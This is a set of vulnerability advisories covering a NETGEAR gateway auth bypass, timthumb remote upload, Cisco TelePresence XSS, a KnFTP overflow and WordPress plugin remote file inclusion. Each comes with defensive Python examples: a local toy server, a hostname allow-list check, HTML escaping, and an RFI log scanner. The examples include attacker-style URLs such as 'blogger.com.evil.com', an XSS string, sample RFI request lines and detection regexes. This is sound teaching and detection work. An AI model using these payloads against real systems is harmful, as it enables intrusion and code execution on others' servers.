The NETGEAR Wireless Cable Modem Gateway CG814WG is supplied by ISPs as customer premises equipment in Australia and abroad. It is a centrally managed ISP solution: each ISP's devices run a customised firmware, and configuration changes and updates can be pushed out as required. HTTP Basic authentication is the primary and only authentication mechanism for the device's administrator interface. It can be bypassed by sending a valid POST request to the device without any Authorization header. The device responds by sending the user to another page that requests Basic authentication, but by that point the request has already been processed. Examples of attacks using this bypass include changing the admin password or enabling the remote (Internet-facing) admin interface. Additionally, because the web application has no CSRF protection, the bypass can be coupled with CSRF so that a victim's browser enables the remote admin interface to the Internet, after which the attacker can use the bypass again across the remote admin interface to reset the admin password and access the device. This attack is possible when targeting a victim who is logged into the device.
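The ordering defect behind this bypass, as an added example that is not the device's firmware or code from the advisory: a minimal Python admin handler that applies the POSTed settings before checking credentials (the device's behaviour), beside the corrected handler that refuses unauthenticated requests before any state changes. The path `/admin`, the form fields `remote_admin` and `admin_password`, the realm and the default credentials are assumptions made for the example.

```python
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

ADMIN_USER = "admin"   # assumption for the example
REALM = "gateway"      # assumption for the example


def basic_header(user, password):
    """Build an HTTP Basic Authorization header value."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def authorized(auth_header, current_password):
    """Validate a Basic Authorization header against the current admin password."""
    if not auth_header or not auth_header.startswith("Basic "):
        return False
    try:
        user, _, password = base64.b64decode(auth_header[6:]).decode().partition(":")
    except ValueError:  # bad base64 or non-UTF-8 credentials
        return False
    return user == ADMIN_USER and password == current_password


class GatewayHandler(BaseHTTPRequestHandler):
    """Toy admin interface; per-server state lives in self.server.state."""
    auth_before_apply = True   # False reproduces the vulnerable ordering

    def log_message(self, *args):
        pass                   # silence request logging

    def _challenge(self):
        self.send_response(401)
        self.send_header("WWW-Authenticate", f'Basic realm="{REALM}"')
        self.end_headers()

    def _apply(self, form):
        """The state change: enabling remote admin or setting the password."""
        state = self.server.state
        if "remote_admin" in form:
            state["remote_admin"] = form["remote_admin"][0] == "1"
        if "admin_password" in form:
            state["admin_password"] = form["admin_password"][0]

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        ok = authorized(self.headers.get("Authorization"),
                        self.server.state["admin_password"])
        if self.auth_before_apply:
            if not ok:
                self._challenge()
                return
            self._apply(form)
        else:
            self._apply(form)      # vulnerable: settings change before the check
            if not ok:
                self._challenge()  # the 401 arrives, but the change already happened
                return
        self.send_response(200)
        self.end_headers()


class VulnerableHandler(GatewayHandler):
    auth_before_apply = False


class FixedHandler(GatewayHandler):
    auth_before_apply = True


def probe(handler_cls, auth_header=None):
    """Run handler_cls on a local port, POST remote_admin=1 to /admin and
    return (HTTP status, whether remote admin ended up enabled)."""
    server = HTTPServer(("127.0.0.1", 0), handler_cls)
    server.state = {"remote_admin": False, "admin_password": "admin"}
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        conn = http.client.HTTPConnection("127.0.0.1", server.server_address[1], timeout=5)
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        if auth_header:
            headers["Authorization"] = auth_header
        conn.request("POST", "/admin", body="remote_admin=1", headers=headers)
        status = conn.getresponse().status
        conn.close()
    finally:
        server.shutdown()
        server.server_close()
    return status, server.state["remote_admin"]


if __name__ == "__main__":
    print("vulnerable, no credentials:", probe(VulnerableHandler))  # (401, True)
    print("fixed, no credentials:     ", probe(FixedHandler))       # (401, False)
    print("fixed, valid credentials:  ", probe(FixedHandler, basic_header("admin", "admin")))  # (200, True)
```

The 401 with its WWW-Authenticate header looks identical in both cases from the client side, which is why the flaw is easy to miss in a quick browser test: the check that matters is whether the state changed, not what status code came back. The same ordering rule applies to any "authenticate then act" handler, whatever the scheme.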
The following WordPress plugins bundle a vulnerable version of the timthumb.php library. By hosting a GIF file with PHP code appended to it on an attacker-controlled domain whose name contains an allowed site, such as blogger.com.evil.com, and passing its URL to the script in the src GET parameter, an attacker can upload a shell and execute arbitrary code on the web server.
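Why a hostname like blogger.com.evil.com gets through, as an added example written in Python rather than the plugin's PHP (this is not timthumb's own code): the substring-style allow-list check that the vulnerable versions effectively performed, beside a check that parses the URL and matches the hostname properly, plus the GIF-signature check that a GIF with PHP appended satisfies. The allowed-site list is modelled on timthumb's defaults and is an assumption.

```python
from urllib.parse import urlparse

# Allowed remote image hosts, after timthumb's default list (assumption: the
# exact list differs between versions).
ALLOWED_SITES = ["flickr.com", "picasa.com", "blogger.com", "wordpress.com", "img.youtube.com"]


def weak_allowed(src):
    """Substring check: passes if any allowed site name appears anywhere in the URL.
    This is the shape of check the vulnerable versions relied on."""
    src = src.lower()
    return any(site in src for site in ALLOWED_SITES)


def strict_allowed(src):
    """Parse the URL, then require the hostname itself to be an allowed site
    or a subdomain of one. Userinfo, path and query cannot influence it."""
    parts = urlparse(src)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname.lower()
    return any(host == site or host.endswith("." + site) for site in ALLOWED_SITES)


GIF_SIGNATURES = (b"GIF87a", b"GIF89a")


def looks_like_gif(data):
    """The kind of magic-bytes check an image fetcher might rely on."""
    return data[:6] in GIF_SIGNATURES


def gif_php_polyglot(php_source):
    """A file that begins with a GIF signature and carries PHP after it. The
    payload here is harmless; the point is that the signature check accepts it."""
    return b"GIF89a\n" + php_source.encode()


if __name__ == "__main__":
    for url in ("http://blogger.com.evil.com/a.gif",
                "http://evil.com/a.gif?flickr.com",
                "http://blogger.com@evil.com/a.gif",
                "http://photos.blogger.com/a.gif"):
        print(f"{url:45} weak={weak_allowed(url)!s:5} strict={strict_allowed(url)}")
    print("polyglot passes GIF check:", looks_like_gif(gif_php_polyglot("<?php echo 'hello'; ?>")))
```

strict_allowed is only half of the fix. Whatever the first bytes of the fetched file say, it must never be written to a location the web server will execute as PHP; the allow-list limits who can supply a file, the storage rule limits what a supplied file can do.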
Cisco TelePresence endpoints have a web interface (HTTP or HTTPS) for management, configuration and reporting. The Call ID (with H.323 or SIP) can be set to an HTML/JavaScript/URL value. If a call is made to another endpoint and an authenticated user browses to the web interface of the endpoint receiving the call (for example to view call statistics), the HTML/JavaScript/URL is rendered in the context of the logged-in user. From that point changes can be made to the system as the authenticated user. The flaw is due to the flexibility of the H.323 ID and SIP Display Name fields and the failure to validate user input correctly.
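The rendering step where this goes wrong, as an added example that is not Cisco's code: a small parser for the display-name part of a SIP From header, followed by a call-list row rendered once by raw string concatenation and once with HTML escaping. The header values and the row layout are constructed for the example; a real endpoint's web interface is not modelled.

```python
import html
import re

# display-name "<" URI ">" form of a SIP From/To header (RFC 3261 name-addr),
# with a quoted or bare display name. Enough for rendering a call list;
# not a full SIP header parser.
NAME_ADDR_RE = re.compile(
    r'^\s*(?:"(?P<quoted>(?:[^"\\]|\\.)*)"|(?P<bare>[^<"]*?))\s*<(?P<uri>[^>]+)>'
)


def parse_from(header):
    """Return (display_name, uri) from a From/To header value."""
    m = NAME_ADDR_RE.match(header)
    if not m:
        raise ValueError("not a name-addr header: %r" % header)
    if m.group("quoted") is not None:
        name = re.sub(r"\\(.)", r"\1", m.group("quoted"))  # unescape \" and \\
    else:
        name = m.group("bare")
    return name.strip(), m.group("uri")


def render_call_row_unsafe(header):
    """Signalling data dropped straight into the page: the flaw in the advisory."""
    name, uri = parse_from(header)
    return f"<tr><td>{name}</td><td>{uri}</td></tr>"


def render_call_row(header):
    """Same row with both fields escaped for an HTML text context."""
    name, uri = parse_from(header)
    return f"<tr><td>{html.escape(name)}</td><td>{html.escape(uri)}</td></tr>"


if __name__ == "__main__":
    hostile = '"<script>alert(1)</script>" <sip:1234@example.com>'
    print(render_call_row_unsafe(hostile))
    print(render_call_row(hostile))
```

Escaping is context-specific: html.escape is right for text between tags, but a display name placed into an attribute, a JavaScript string or a URL needs the encoding for that context instead, which is why the fix belongs in the rendering layer rather than in a length or character-class restriction on the signalling field.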
KnFTP 1.0.0 Server is vulnerable to a remote buffer overflow when it receives a specially crafted 'USER' command. An attacker can exploit this to execute arbitrary code on the target system.
The Relocate Upload WordPress plugin is vulnerable to Remote File Inclusion (RFI). An attacker can send a malicious request to the relocate-upload.php script with an 'abspath' parameter containing a URL to an attacker-controlled file, which the script includes, allowing arbitrary code execution on the vulnerable server.
The Mini Mail Dashboard Widget WordPress plugin is vulnerable to Remote File Inclusion (RFI). An attacker can send a malicious POST request to the wp-mini-mail.php file with an 'abspath' parameter containing a URL pointing to a malicious file, allowing arbitrary code execution on the vulnerable server.
The Zingiri Web Shop WordPress plugin is vulnerable to Remote File Inclusion (RFI), which allows an attacker to include a remote file, usually via a malicious URL, and execute it on the vulnerable server. The vulnerable code is in init.inc.php, which initialises the plugin; it passes user-supplied input to an include without validating it, so an attacker can include a file from a remote server.
The Mailing List WordPress plugin is vulnerable to Remote File Inclusion (RFI). By sending a specially crafted HTTP request, an attacker can have the vulnerable server include a remote file, such as a malicious PHP script, and execute arbitrary code on it.
The Disclosure Policy Plugin WordPress plugin is vulnerable to Remote File Inclusion (RFI). An attacker can send a malicious request to the action.php file with a crafted URL carrying an RFI payload, which can be used to execute arbitrary code on the vulnerable server.
The Livesig WordPress plugin is vulnerable to Remote File Inclusion (RFI). An attacker can send a malicious POST request to the livesig-ajax-backend.php file with a 'wp-root' parameter, which the script uses in a file include; supplying a remote URL in it causes arbitrary code to execute on the server.
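A detection check for the abspath/wp-root style of RFI described in the six plugin advisories above, as an added example that is not code from any of the plugins: it parses combined-format web access log lines and flags requests to the named plugin scripts whose parameters carry a remote URL or PHP stream wrapper. The log lines, IP addresses (RFC 5737 documentation ranges) and plugin directory paths are constructed for the example; where an advisory does not name the parameter, every parameter of that script is checked.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts and parameters named in the advisories above. None means the
# advisory does not name the parameter, so every parameter is checked.
WATCHED_SCRIPTS = {
    "relocate-upload.php": {"abspath"},
    "wp-mini-mail.php": {"abspath"},
    "init.inc.php": None,
    "action.php": None,
    "livesig-ajax-backend.php": {"wp-root"},
}

# Values that make a PHP include() fetch something other than a local file.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect)\s*:", re.I)

# Apache/nginx combined log format, up to the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_request(ip, target, body=""):
    """Findings for one request as (ip, script, parameter, decoded value)."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in WATCHED_SCRIPTS:
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    for name, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(name, []).extend(values)
    watched = WATCHED_SCRIPTS[script]
    findings = []
    for name, values in params.items():
        if watched is not None and name not in watched:
            continue
        for value in values:
            decoded = unquote(value)  # second decode catches double-encoded values
            if REMOTE_RE.match(decoded):
                findings.append((ip, script, name, decoded))
    return findings


def scan_access_log(lines):
    """Scan log lines; only query-string parameters are visible here."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            findings.extend(scan_request(m["ip"], m["target"]))
    return findings


# Constructed sample log lines: two RFI attempts (one double-encoded), one
# local path, one unrelated script carrying a URL parameter.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Aug/2011:12:00:01 +1000] "GET /wp-content/plugins/relocate-upload/relocate-upload.php?abspath=http://198.51.100.5/s.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Aug/2011:12:00:02 +1000] "GET /wp-content/plugins/relocate-upload/relocate-upload.php?abspath=http%253A%252F%252F198.51.100.5%252Fs.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Aug/2011:12:00:03 +1000] "GET /wp-content/plugins/relocate-upload/relocate-upload.php?abspath=/var/www/html HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Aug/2011:12:00:04 +1000] "GET /index.php?p=http://example.com/ HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print("RFI attempt:", finding)
    # A POST body from a body-logging source (constructed), for the POST-based cases.
    for finding in scan_request("203.0.113.7",
                                "/wp-content/plugins/livesig/livesig-ajax-backend.php",
                                body="wp-root=http%3A%2F%2F198.51.100.5%2Fs.txt%3F"):
        print("RFI attempt:", finding)
```

Access logs carry only the query string, so the POST-based cases (wp-mini-mail.php and livesig-ajax-backend.php) need request-body logging, for example a WAF audit log, fed to scan_request with the body as in the last call. timthumb.php is deliberately absent from the watch list: its src parameter legitimately carries remote URLs, so a URL-in-parameter rule would only produce noise there and the hostname allow-list is the right control.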